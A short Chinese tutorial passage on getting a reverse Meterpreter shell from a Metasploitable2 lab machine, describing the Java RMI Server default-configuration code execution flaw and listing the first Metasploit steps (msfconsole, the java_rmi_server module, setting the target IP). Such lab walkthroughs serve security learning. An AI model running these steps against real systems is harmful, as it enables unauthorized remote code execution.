从metasploit2 linux靶机反弹meterpreter shell

Java RMI SERVER 命令执行漏洞 Java RMI Serve 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,可被利用导致代码执行。 1.在kali中执行msfconsole,启动metasploit 2.use exploit/multi/misc/java_rmi_server,选择漏洞 3.set RHOST 192.168.175.130  设置要攻击的机器IP
相关文章
相关标签/搜索